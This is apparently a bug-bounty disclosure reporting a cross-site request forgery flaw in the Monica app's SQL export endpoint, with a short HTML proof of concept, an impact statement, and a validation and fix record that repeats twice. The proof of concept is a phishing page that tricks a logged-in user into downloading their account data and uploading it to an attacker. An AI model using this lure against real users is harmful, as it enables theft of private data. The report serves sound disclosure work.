/

Cross-Site Request Forgery (CSRF) in monicahq/monica

Valid

Reported on

Jun 3rd 2021

✍️ Description

The /settings/exportToSql endpoint does not have CSRF Protection. This could be used to force download account data and potentially spoof users.

🕵️‍♂️ Proof of Concept

Login to user account. Create the following file and open the page in browser.

// PoC.html
<html>
<body>
        To verify that you are a human, upload the file that has been downloaded from our website now.
        <a href="https://app.monicahq.com/settings/exportToSql">Download Test File</a>
</body>
</html>

This downloads user's data from the application without user's permission. An attacker can then spoof the user to upload this file into an attacker controlled server.

💥 Impact

Potential private information leakage through phishing by exploiting missing CSRF token.

References

Similar accepted attack

Yadhu Krishna M

commented 2 years ago

wow

Alexis Saettler validated this vulnerability 2 years ago

Oomb has been awarded the disclosure bounty

The fix bounty is now up for grabs

Alexis Saettler marked this as fixed with commit cefeb9 2 years ago

Alexis Saettler has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

Yadhu Krishna M

commented 2 years ago

wow

Alexis Saettler validated this vulnerability 2 years ago

Oomb has been awarded the disclosure bounty

The fix bounty is now up for grabs

Alexis Saettler marked this as fixed with commit cefeb9 2 years ago

Alexis Saettler has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation